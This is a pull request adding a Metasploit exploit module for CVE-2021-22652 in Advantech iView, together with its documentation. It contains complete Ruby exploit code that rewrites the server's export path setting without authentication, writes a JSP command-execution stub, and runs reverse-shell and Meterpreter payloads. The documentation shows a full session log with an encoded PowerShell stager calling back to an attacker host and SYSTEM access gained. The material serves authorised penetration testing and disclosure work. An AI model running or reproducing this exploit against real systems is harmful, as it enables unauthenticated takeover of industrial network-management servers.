### PR TITLE
Add Advantech iView CVE-2021-22652 exploit

### DIFF
--- a/documentation/modules/exploit/windows/http/advantech_iview_unauth_rce.md
+++ b/documentation/modules/exploit/windows/http/advantech_iview_unauth_rce.md
@@ -1,0 +1,74 @@
+## Vulnerable Application
+This module exploits an unauthenticated configuration change combined with an unauthenticated file write primitive,
+leading to an arbitrary file write that allows for remote code execution as the user running iView, which is typically
+NT AUTHORITY\SYSTEM.
+
+The exploit functions by first modifying a configuration value to be a writeable path in the webroot. An export function
+is then leveraged to write JSP content into the previously configured which can then be requested to trigger the
+execution of an OS command within the context of the application. Once completed, the original configuration value is
+restored.
+
+### Setup (Windows)
+
+1. Follow each of the steps from the iView Installation Instructions guide that is distributed with the application.
+    * The installer contains the necessary dependencies. This guide will outlines the steps necessary for configuring 
+      each of them.
+1. Once the installation is complete, the "Installation Verification" step (Step 6) will most likely fail. This is
+  because the "Apache Tomcat 6" service is not running. Attempting to start it will fail. To correct this issue:
+    1. Copy the `msvcr100.dll` file from `C:\Program Files (x86)\Java\jre7\bin` to `C:\Program Files (x86)\iView\Apache
+      Software Foundation\Tomcat6.0\bin`.
+    1. Restart the "Apache Tomcat 6" service.
+1 At this point, the application should be listening on port 8080 and no additional configuraiton is necessary.
+
+## Verification Steps
+
+1. Install the application (see the "Setup" section)
+1. Start msfconsole
+1. Do: `use exploit/windows/http/advantech_iview_unauth_rce`
+1. Set the `RHOST` and `PAYLOAD` options as applicable
+1. Do: `run`
+1. You should get a shell.
+
+## Scenarios
+### Windows 10 v1909 x64 running Advantech iView 5.7.0002.5992
+
+```
+msf6 exploit(windows/http/advantech_iview_unauth_rce) > set RHOSTS 192.168.159.30
+RHOSTS => 192.168.159.30
+msf6 exploit(windows/http/advantech_iview_unauth_rce) > check
+[*] 192.168.159.30:8080 - The target appears to be vulnerable.
+msf6 exploit(windows/http/advantech_iview_unauth_rce) > exploit
+
+[*] Started HTTPS reverse handler on https://192.168.159.128:8443
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable.
+[*] Retrieving config
+[+] Successfully retrieved config
+[*] Updating config
+[+] Successfully updated config
+[*] Writing JSP stub
+[+] Successfully wrote JSP stub
+[*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_https
+[*] Executing command: cmd.exe /c powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
+[+] Successfully executed command
+[*] Restoring config
+[+] Successfully restored config
+[*] https://192.168.159.128:8443 handling request from 192.168.159.30; (UUID: romk3zgq) Staging x64 payload (201308 bytes) ...
+[*] Meterpreter session 1 opened (192.168.159.128:8443 -> 192.168.159.30:62405) at 2021-03-22 15:01:57 -0400
+[!] This exploit may require manual cleanup of 'webapps\iView3\SpmIkVwVxCmze0kQ8PhSUVHXRrRNLa.jsp' on the target
+
+meterpreter > 
+[+] Deleted webapps\iView3\SpmIkVwVxCmze0kQ8PhSUVHXRrRNLa.jsp
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DESKTOP-RTCRBEV
+OS              : Windows 10 (10.0 Build 18363).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > 
+```

--- a/documentation/modules/exploit/windows/http/advantech_iview_unauth_rce.md
+++ b/documentation/modules/exploit/windows/http/advantech_iview_unauth_rce.md
@@ -3,7 +3,7 @@ This module exploits an unauthenticated configuration change combined with an un
 leading to an arbitrary file write that allows for remote code execution as the user running iView, which is typically
 NT AUTHORITY\SYSTEM.
 
-The exploit functions by first modifying a configuration value to be a writeable path in the webroot. An export function
+The exploit functions by first modifying a configuration value to be a writable path in the webroot. An export function
 is then leveraged to write JSP content into the previously configured which can then be requested to trigger the
 execution of an OS command within the context of the application. Once completed, the original configuration value is
 restored.
@@ -11,14 +11,14 @@ restored.
 ### Setup (Windows)
 
 1. Follow each of the steps from the iView Installation Instructions guide that is distributed with the application.
-    * The installer contains the necessary dependencies. This guide will outlines the steps necessary for configuring 
+    * The installer contains the necessary dependencies. This guide will outlines the steps necessary for configuring
       each of them.
 1. Once the installation is complete, the "Installation Verification" step (Step 6) will most likely fail. This is
   because the "Apache Tomcat 6" service is not running. Attempting to start it will fail. To correct this issue:
     1. Copy the `msvcr100.dll` file from `C:\Program Files (x86)\Java\jre7\bin` to `C:\Program Files (x86)\iView\Apache
       Software Foundation\Tomcat6.0\bin`.
     1. Restart the "Apache Tomcat 6" service.
-1 At this point, the application should be listening on port 8080 and no additional configuraiton is necessary.
+1 At this point, the application should be listening on port 8080 and no additional configuration is necessary.
 
 ## Verification Steps
 
@@ -57,7 +57,7 @@ msf6 exploit(windows/http/advantech_iview_unauth_rce) > exploit
 [*] Meterpreter session 1 opened (192.168.159.128:8443 -> 192.168.159.30:62405) at 2021-03-22 15:01:57 -0400
 [!] This exploit may require manual cleanup of 'webapps\iView3\SpmIkVwVxCmze0kQ8PhSUVHXRrRNLa.jsp' on the target
 
-meterpreter > 
+meterpreter >
 [+] Deleted webapps\iView3\SpmIkVwVxCmze0kQ8PhSUVHXRrRNLa.jsp
 
 meterpreter > getuid
@@ -70,5 +70,5 @@ System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x64/windows
-meterpreter > 
+meterpreter >
 ```

--- a/modules/exploits/windows/http/advantech_iview_unauth_rce.rb
+++ b/modules/exploits/windows/http/advantech_iview_unauth_rce.rb
@@ -87,8 +87,24 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    # TODO: Implement the version check from the blog post
-    CheckCode::Unsupported
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'MenuServlet'),
+      'vars_get' => {
+        'page_action_type' => 'getMenuFragment',
+        'page' => 'version.frag'
+      }
+    )
+    return CheckCode::Unknown unless res&.code == 200
+
+    version = res.get_html_document.xpath('string(//input[starts-with(@value, "Version")]/@value)')
+    return CheckCode::Unknown unless version =~ /Version (\d+\.\d+) \(Build ([\d.]+)\)/
+
+    version = "#{Regexp.last_match(1)}.#{Regexp.last_match(2)}"
+    vprint_status("Identified the version as #{version}")
+    return CheckCode::Safe if Rex::Version.new(version) >= Rex::Version.new('5.7.03.6112')
+
+    CheckCode::Appears
   end
 
   def exploit

--- a/modules/exploits/windows/http/advantech_iview_unauth_rce.rb
+++ b/modules/exploits/windows/http/advantech_iview_unauth_rce.rb
@@ -1,0 +1,245 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Advantech iView Unauthenticated Remote Code Execution',
+        'Description' => %q{
+          This module exploits an unauthenticated configuration change combined
+          with an unauthenticated file write primitive, leading to an arbitrary
+          file write that allows for remote code execution as the user running
+          iView, which is typically NT AUTHORITY\SYSTEM.
+
+          This issue was demonstrated in the vulnerable version 5.7.02.5992 and
+          fixed in version 5.7.03.6112.
+        },
+        'Author' => 'wvu',
+        'References' => [
+          ['CVE', '2021-22652'],
+          ['URL', 'https://blog.rapid7.com/2021/02/11/cve-2021-22652-advantech-iview-missing-authentication-rce-fixed/'],
+          ['URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-040-02']
+        ],
+        'DisclosureDate' => '2021-02-09', # ICS-CERT advisory
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Windows Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :win_dropper,
+              'DefaultOptions' => {
+                'CMDSTAGER::FLAVOR' => :psh_invokewebrequest,
+                'PAYLOAD' => 'windows/x64/meterpreter_reverse_https'
+              }
+            }
+          ],
+          [
+            'PowerShell Stager',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :psh_stager,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 2,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(8080),
+      OptString.new('TARGETURI', [true, 'Application path', '/iView3'])
+    ])
+  end
+
+  def check
+    # TODO: Implement the version check from the blog post
+    CheckCode::Unsupported
+  end
+
+  def exploit
+    config = retrieve_config
+    update_config(config)
+    write_jsp_stub # TODO: Is this necessary to avoid badchars?
+
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    case target['Type']
+    when :win_cmd
+      execute_command(payload.encoded)
+    when :win_dropper
+      execute_cmdstager
+    when :psh_stager
+      execute_command(cmd_psh_payload(
+        payload.encoded,
+        payload.arch.first,
+        remove_comspec: true
+      ))
+    end
+  ensure
+    restore_config(config) if config
+  end
+
+  def retrieve_config
+    print_status('Retrieving config')
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'NetworkServlet'),
+      'vars_post' => {
+        'page_action_type' => 'retrieveSystemSettings'
+      }
+    )
+
+    unless res && res.code == 200 && (config = res.get_json_document.first)
+      fail_with(Failure::NotFound, 'Failed to retrieve config')
+    end
+
+    print_good('Successfully retrieved config')
+    vprint_line(JSON.pretty_generate(config))
+
+    config
+  end
+
+  def update_config(config)
+    print_status('Updating config')
+
+    config = config.dup
+    config['EXPORTPATH'] = 'webapps\\iView3\\'
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'NetworkServlet'),
+      'vars_post' => {
+        'page_action_type' => 'updateSystemSettings',
+        'json_obj' => config.to_json
+      }
+    )
+
+    unless res && res.code == 200 && (config = res.get_json_document.first)
+      fail_with(Failure::NotFound, 'Failed to retrieve config')
+    end
+
+    unless config['EXPORTPATH'] == 'webapps\\iView3\\'
+      fail_with(Failure::NotVulnerable, 'Failed to update config')
+    end
+
+    print_good('Successfully updated config')
+    vprint_line(JSON.pretty_generate(config))
+  end
+
+  def write_jsp_stub
+    print_status('Writing JSP stub')
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'NetworkServlet'),
+      'vars_post' => {
+        'page_action_type' => 'exportInventoryTable',
+        'col_list' => "#{jsp_stub}-NULL",
+        'sortname' => 'NULL',
+        'sortorder' => '',
+        'filename' => jsp_filename
+      }
+    )
+
+    unless res && res.code == 200
+      fail_with(Failure::NotVulnerable, 'Failed to write JSP stub')
+    end
+
+    register_file_for_cleanup("webapps\\iView3\\#{jsp_filename}")
+
+    print_good('Successfully wrote JSP stub')
+  end
+
+  def execute_command(cmd, _opts = {})
+    cmd.prepend('cmd.exe /c ')
+
+    print_status("Executing command: #{cmd}")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, jsp_filename),
+      'vars_post' => {
+        jsp_param => cmd
+      }
+    )
+
+    unless res && res.code == 200
+      fail_with(Failure::PayloadFailed, 'Failed to execute command')
+    end
+
+    print_good('Successfully executed command')
+  end
+
+  def restore_config(config)
+    print_status('Restoring config')
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'NetworkServlet'),
+      'vars_post' => {
+        'page_action_type' => 'updateSystemSettings',
+        'json_obj' => config.to_json
+      }
+    )
+
+    unless res && res.code == 200 && (config = res.get_json_document.first)
+      fail_with(Failure::NotFound, 'Failed to retrieve config')
+    end
+
+    if config['EXPORTPATH'] == 'webapps\\iView3\\'
+      fail_with(Failure::UnexpectedReply, 'Failed to restore config')
+    end
+
+    print_good('Successfully restored config')
+    vprint_line(JSON.pretty_generate(config))
+  end
+
+  def jsp_stub
+    %(<% Runtime.getRuntime().exec(request.getParameter("#{jsp_param}")); %>)
+  end
+
+  def jsp_param
+    @jsp_param ||= rand_text_alphanumeric(8..42)
+  end
+
+  def jsp_filename
+    @jsp_filename ||= "#{rand_text_alphanumeric(8..42)}.jsp"
+  end
+
+end

--- a/modules/exploits/windows/http/advantech_iview_unauth_rce.rb
+++ b/modules/exploits/windows/http/advantech_iview_unauth_rce.rb
@@ -91,9 +91,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     res = send_request_cgi(
-      'method' => 'GET',
+      'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'MenuServlet'),
-      'vars_get' => {
+      'vars_post' => {
         'page_action_type' => 'getMenuFragment',
         'page' => 'version.frag'
       }

--- a/modules/exploits/windows/http/advantech_iview_unauth_rce.rb
+++ b/modules/exploits/windows/http/advantech_iview_unauth_rce.rb
@@ -27,7 +27,10 @@ class MetasploitModule < Msf::Exploit::Remote
           This issue was demonstrated in the vulnerable version 5.7.02.5992 and
           fixed in version 5.7.03.6112.
         },
-        'Author' => 'wvu',
+        'Author' => [
+          'wvu', # Discovery and exploit
+          'Spencer McIntyre' # Finishing the module, particularly the check
+        ],
         'References' => [
           ['CVE', '2021-22652'],
           ['URL', 'https://blog.rapid7.com/2021/02/11/cve-2021-22652-advantech-iview-missing-authentication-rce-fixed/'],

--- a/modules/exploits/windows/http/advantech_iview_unauth_rce.rb
+++ b/modules/exploits/windows/http/advantech_iview_unauth_rce.rb
@@ -113,7 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     config = retrieve_config
     updated = update_config(config)
-    write_jsp_stub # TODO: Is this necessary to avoid badchars?
+    write_jsp_stub
 
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
 

--- a/modules/exploits/windows/http/advantech_iview_unauth_rce.rb
+++ b/modules/exploits/windows/http/advantech_iview_unauth_rce.rb
@@ -112,7 +112,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     config = retrieve_config
-    update_config(config)
+    updated = update_config(config)
     write_jsp_stub # TODO: Is this necessary to avoid badchars?
 
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
@@ -130,7 +130,7 @@ class MetasploitModule < Msf::Exploit::Remote
       ))
     end
   ensure
-    restore_config(config) if config
+    restore_config(config) if config && updated
   end
 
   def retrieve_config
@@ -170,7 +170,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     unless res && res.code == 200 && (config = res.get_json_document.first)
-      fail_with(Failure::NotFound, 'Failed to retrieve config')
+      fail_with(Failure::NotFound, 'Failed to retrieve updated config')
     end
 
     unless config['EXPORTPATH'] == 'webapps\\iView3\\'
@@ -179,6 +179,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_good('Successfully updated config')
     vprint_line(JSON.pretty_generate(config))
+
+    true
   end
 
   def write_jsp_stub
@@ -238,7 +240,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     unless res && res.code == 200 && (config = res.get_json_document.first)
-      fail_with(Failure::NotFound, 'Failed to retrieve config')
+      fail_with(Failure::NotFound, 'Failed to retrieve restored config')
     end
 
     if config['EXPORTPATH'] == 'webapps\\iView3\\'

--- a/modules/exploits/windows/http/advantech_iview_unauth_rce.rb
+++ b/modules/exploits/windows/http/advantech_iview_unauth_rce.rb
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Author' => [
           'wvu', # Discovery and exploit
-          'Spencer McIntyre' # Finishing the module, particularly the check
+          'Spencer McIntyre' # Check, docs, and testing
         ],
         'References' => [
           ['CVE', '2021-22652'],


### PR DESCRIPTION
## To-do

- [x] Implement `check` (see `TODO:` comment)
- [x] Investigate JSP stub (see `TODO:` comment)
- [x] Write module doc

```
msf6 exploit(windows/http/advantech_iview_unauth_rce) > info

       Name: Advantech iView Unauthenticated Remote Code Execution
     Module: exploit/windows/http/advantech_iview_unauth_rce
   Platform: Windows
       Arch: cmd, x86, x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2021-02-09

Provided by:
  wvu <wvu@metasploit.com>
  Spencer McIntyre

Module side effects:
 ioc-in-logs
 config-changes
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Windows Command
  1   Windows Dropper
  2   PowerShell Stager

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      8080             yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /iView3          yes       Application path
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an unauthenticated configuration change
  combined with an unauthenticated file write primitive, leading to an
  arbitrary file write that allows for remote code execution as the
  user running iView, which is typically NT AUTHORITY\SYSTEM. This
  issue was demonstrated in the vulnerable version 5.7.02.5992 and
  fixed in version 5.7.03.6112.

References:
  https://cvedetails.com/cve/CVE-2021-22652/
  https://blog.rapid7.com/2021/02/11/cve-2021-22652-advantech-iview-missing-authentication-rce-fixed/
  https://us-cert.cisa.gov/ics/advisories/icsa-21-040-02

msf6 exploit(windows/http/advantech_iview_unauth_rce) >
```

* https://blog.rapid7.com/2021/02/11/cve-2021-22652-advantech-iview-missing-authentication-rce-fixed/
* https://us-cert.cisa.gov/ics/advisories/icsa-21-040-02